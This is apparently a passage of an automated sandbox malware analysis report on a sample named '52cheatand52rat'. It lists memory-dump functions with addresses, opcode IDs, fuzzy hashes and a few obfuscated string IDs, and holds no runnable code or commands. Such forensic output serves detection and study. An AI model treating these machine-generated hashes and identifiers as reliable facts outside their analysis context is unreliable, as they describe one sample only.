                                                    • Opcode ID: 9538c44ea9a1ecf648df8d1af7001ca72b4baa9460e70c31c9a9136348d4f390
                                                    • Instruction ID: 22321767ab8e20753c86ef43af7094a376c9715eb59a49378693316c6fbd296c
                                                    • Opcode Fuzzy Hash: 9538c44ea9a1ecf648df8d1af7001ca72b4baa9460e70c31c9a9136348d4f390
                                                    • Instruction Fuzzy Hash: 29210426B1CE4D0FE754EB6C58AA67577C2EF8A264B0401FAE40DD3293DD69AC428381
                                                    Function 00007FFD342B2A7A Relevance: .1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 671fa71e65fcb102f618d3c810aca3c52fb033692f6797917fdb83ad70f118eb
                                                    • Instruction ID: ff9a38e8bc276db4b74cbec7434742c46ff3cdd48ad34715f4ab1cd02143a841
                                                    • Opcode Fuzzy Hash: 671fa71e65fcb102f618d3c810aca3c52fb033692f6797917fdb83ad70f118eb
                                                    • Instruction Fuzzy Hash: 0E216634A1C7864FC756973884649657BE0EF83321B0601BBE448EB1A2CE5CE842C7D2
                                                    Function 00007FFD342B07B8 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e91ad6b6bba5d8493d0280ce047b59a1069892fc26ab3f92b8513cfb9775a6e8
                                                    • Instruction ID: 8f45cb0e12ba4f84296d0e5dbfe72fe935d2be8d357db2e2f50521f8aaada4f4
                                                    • Opcode Fuzzy Hash: e91ad6b6bba5d8493d0280ce047b59a1069892fc26ab3f92b8513cfb9775a6e8
                                                    • Instruction Fuzzy Hash: B611E625B1CD1D0FE668EA2C54AA67977C2EB8D264F0405BAE40DE3292DC69EC419380
                                                    Function 00007FFD342B6E6D Relevance: .1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72b9fefbe243acc30fc9a9cfe2b92a6a5ff25bbbcf3eb85d0730dd030dfc142c
                                                    • Instruction ID: d9d1b46d1c3ff80d773661d3cdb54898a6219a9583525cd25d3d39a5b2e6eb2d
                                                    • Opcode Fuzzy Hash: 72b9fefbe243acc30fc9a9cfe2b92a6a5ff25bbbcf3eb85d0730dd030dfc142c
                                                    • Instruction Fuzzy Hash: 6921E731A085494FDB81DBA8C4556EEBBF1EF4B310F0442FAD549DB293DE3C98428B91
                                                    Function 00007FFD342B3F65 Relevance: .1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7152f168c568aa0cabcc5da9663d1b78d54c9d321c72140a8bacf36a8fbe71bd
                                                    • Instruction ID: b340c6469961e56096c87e7f8644c6dd4c441f678746625022ca659b01b0df3d
                                                    • Opcode Fuzzy Hash: 7152f168c568aa0cabcc5da9663d1b78d54c9d321c72140a8bacf36a8fbe71bd
                                                    • Instruction Fuzzy Hash: 4D11D53AF0CD5E4EF7B8966448F12F976E1EF4A310F440975D61CE3183ED9E680A2681
                                                    Function 00007FFD342B6C19 Relevance: .1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8771baaf52806f82d320dc4cab58921da7d166eee88fad3ba22e755c0e9c934
                                                    • Instruction ID: d054b4908eae845e5b2c213fa9b21bf77ed48556eed6e3308e8d0c4ff8b53425
                                                    • Opcode Fuzzy Hash: d8771baaf52806f82d320dc4cab58921da7d166eee88fad3ba22e755c0e9c934
                                                    • Instruction Fuzzy Hash: 0F110819F0D6470FEF525B2854A92A43BD0DF17740F0840F5DA89E71A3DE4E7C159342
                                                    Function 00007FFD342B6C27 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 665b40235fdaed664592537e8e86785314c771a0137cb5184c650da9ab1342f7
                                                    • Instruction ID: e7a465674a9c4a89dcc29634f86d92994df7d90c489098a26519a3b0383d6c06
                                                    • Opcode Fuzzy Hash: 665b40235fdaed664592537e8e86785314c771a0137cb5184c650da9ab1342f7
                                                    • Instruction Fuzzy Hash: CF11A319B0D50B0FEF916A2C24A92A43BD0DF1AB84F4400F5DE89E71A6DE4E7C165282
                                                    Function 00007FFD342B426F Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7166ee602021e48fe03c24b757d27b796b6ecc45cfa2c49dc271d5e232675b21
                                                    • Instruction ID: 22d05fd73c6ff6dc3dd756efe6e448c86fccfcf6a1a598f2d8d1dca426a802f4
                                                    • Opcode Fuzzy Hash: 7166ee602021e48fe03c24b757d27b796b6ecc45cfa2c49dc271d5e232675b21
                                                    • Instruction Fuzzy Hash: C1014936A0E94D4FEF049A5AACD01E67B94FF89328F04027BE51CD3181DFAA9556C741
                                                    Function 00007FFD342B3E74 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 38fa747c4bdbcb6af5adf88d9ead4846b99f9dc1d64353545d40e821c94c0779
                                                    • Instruction ID: 96899e4332c319670fa1886396164d5dd0413db4abc5bc66bf7ef401fff8af24
                                                    • Opcode Fuzzy Hash: 38fa747c4bdbcb6af5adf88d9ead4846b99f9dc1d64353545d40e821c94c0779
                                                    • Instruction Fuzzy Hash: EC01F730F1C5060FF754BA2C546527977C1DB56318F44017AEC09EB2E3ED9AAC818382
                                                    Function 00007FFD342B17E9 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1bfa856cd1542786e1ec72b1611ce2924a2e1eb2e1ac464f27ad84a8412c62ed
                                                    • Instruction ID: 4ed456bba1c994c92e82bbfbb198026f4765e2bf0458879df8d2427465c05f02
                                                    • Opcode Fuzzy Hash: 1bfa856cd1542786e1ec72b1611ce2924a2e1eb2e1ac464f27ad84a8412c62ed
                                                    • Instruction Fuzzy Hash: 3B01473150CB884FC786C718C4A05E6BBE1FF8A320F4405BFF185D72A2CE659940C382
                                                    Function 00007FFD342B0E10 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 25fe278f7e1b25ee833b07d7a490057943fe518e6c2ba21334e8b666cb369af4
                                                    • Instruction ID: efda31040a29fc87bc1434fec31f15c4c3f9f957f913b7867404aa53c3bf7b20
                                                    • Opcode Fuzzy Hash: 25fe278f7e1b25ee833b07d7a490057943fe518e6c2ba21334e8b666cb369af4
                                                    • Instruction Fuzzy Hash: D3F0A43660CB4D5FD788D608D4A46BA77D1FFD9390F80053EF18AE33A0CE6AA8408781
                                                    Function 00007FFD342B1A80 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d95f07407f480e7bcd74728760cb0aa772054731bc545ca7d64268769748f932
                                                    • Instruction ID: f0baafa4501e6fbf3d1a9a5e92495ab41c650d062db8a3bad1e1c90861c4db5e
                                                    • Opcode Fuzzy Hash: d95f07407f480e7bcd74728760cb0aa772054731bc545ca7d64268769748f932
                                                    • Instruction Fuzzy Hash: 54E0C071E0CF4C4FDF40AA1CA8906EA7FA0FF89358F04006AE01DD32C0CB266850C342
                                                    Function 00007FFD342B0CFD Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7d943563f137bebe16ceff6284b26d3f42713b90e5dd5842e1deb444fe884ad
                                                    • Instruction ID: e1b7a3e2fc05d81b6ec122bcb2fa4267c7772b342e690451ac5fbd3046725050
                                                    • Opcode Fuzzy Hash: d7d943563f137bebe16ceff6284b26d3f42713b90e5dd5842e1deb444fe884ad
                                                    • Instruction Fuzzy Hash: 37E0C221F5880E4DEA51F3F42876AFDB249EF89300BC04831E10DD2083CD5D24010281
                                                    Function 00007FFD342B09AD Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a96d8c109534d698fb6ead23989b56c8708d4a8b0cee25912f4326fc29223c3
                                                    • Instruction ID: c1e603337ac6e449846d33cc4e2cb2617947f160df9772e657009b06df1642f9
                                                    • Opcode Fuzzy Hash: 7a96d8c109534d698fb6ead23989b56c8708d4a8b0cee25912f4326fc29223c3
                                                    • Instruction Fuzzy Hash: C7E0C221F4980A4DFA11B3F428771FDB299DF89304FC00831E10DD2083CD5D28020181
                                                    Function 00007FFD342B08FE Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fdf1531ee7ded53eb665387c47fdfd1e63ca842a15d06853555da0a6aede0fa9
                                                    • Instruction ID: eddcd008927970c6ed6fd87b6e6d5c8d8e4742a7b42598d5d3058f02078e72c5
                                                    • Opcode Fuzzy Hash: fdf1531ee7ded53eb665387c47fdfd1e63ca842a15d06853555da0a6aede0fa9
                                                    • Instruction Fuzzy Hash: 72D0123251C7094BC315AF54E4504DAB7A0FB85364F400B3DE09A95291DF6892818682
                                                    Function 00007FFD342B0C57 Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 78b0f5b5fa7c54c8e89b94f92ada5da6095beed9be57945353ae8c582d2a54e5
                                                    • Instruction ID: cf36096846b60377cd2e8c5b76668915136e02f83b56cfce8b3134b7bbeb831c
                                                    • Opcode Fuzzy Hash: 78b0f5b5fa7c54c8e89b94f92ada5da6095beed9be57945353ae8c582d2a54e5
                                                    • Instruction Fuzzy Hash: 13D05E3292CB094BD345EF14E4508EAB7A0FF85320F840B2DF06E962D5DF7892818682
                                                    Function 00007FFD342B3F43 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b98fb3ca0422ec182acada8020c46d2f7432b3deb85cef3b81dc2009e266591c
                                                    • Instruction ID: ab790040836f9aed958c099d874007fa90aec0542a047a6669ade783f9116a98
                                                    • Opcode Fuzzy Hash: b98fb3ca0422ec182acada8020c46d2f7432b3deb85cef3b81dc2009e266591c
                                                    • Instruction Fuzzy Hash: A9C0123256C64957D341A710E4518EB7351FF90200F801F79F04A91095DD6D66458582

                                                    Non-executed Functions

                                                    Function 00007FFD342B0700 Relevance: 8.9, Strings: 7, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ?O_I$O_^ $O_^"$O_^0$O_^2$O_^4$O_^6
                                                    • API String ID: 0-943114137
                                                    • Opcode ID: 2ecd22ffb78a1290a5ade4af85fac96c3150ab9b8231c09cf19dd88a45db9774
                                                    • Instruction ID: 9e292e40083f54a191f83b5a9777cc9f8d86dbe0263d2a3f14d97493bd456fb6
                                                    • Opcode Fuzzy Hash: 2ecd22ffb78a1290a5ade4af85fac96c3150ab9b8231c09cf19dd88a45db9774
                                                    • Instruction Fuzzy Hash: C3412D5B70E5C10EE6232BAC28A41EA7F90EF4122475841F7D1DCEA297ED59A94AC3C4
                                                    Function 00007FFD342B0758 Relevance: 5.0, Strings: 4, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^0$O_^2$O_^4$O_^6
                                                    • API String ID: 0-2383015730
                                                    • Opcode ID: 55b4d321bf5110345a9bed2c7e9949b33a90f6285e5e94064c057fb600d2b6d2
                                                    • Instruction ID: 37e380d737aaa4985e383e5353dc472270f33de4808753394787bada53b3b00a
                                                    • Opcode Fuzzy Hash: 55b4d321bf5110345a9bed2c7e9949b33a90f6285e5e94064c057fb600d2b6d2
                                                    • Instruction Fuzzy Hash: 19D012FE9900280DD5121CE014E00FDAB88820137A3202AA3D56FD9203C941D2D3D040
                                                    Function 00007FFD342B0728 Relevance: 5.0, Strings: 4, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^0$O_^2$O_^4$O_^6
                                                    • API String ID: 0-2383015730
                                                    • Opcode ID: ab70584348ba4e5f5f14a7e23e48dd19a264103c1ef843e4a4ee4b26a8f717ea
                                                    • Instruction ID: 94717e82564bb2fd642bbbe33e7d215ddfe9e98ad844e23be23c8613018f736e
                                                    • Opcode Fuzzy Hash: ab70584348ba4e5f5f14a7e23e48dd19a264103c1ef843e4a4ee4b26a8f717ea
                                                    • Instruction Fuzzy Hash: E6B002135190D200D23175E874620E56F554F0513974C4571D0CC581536D0634858184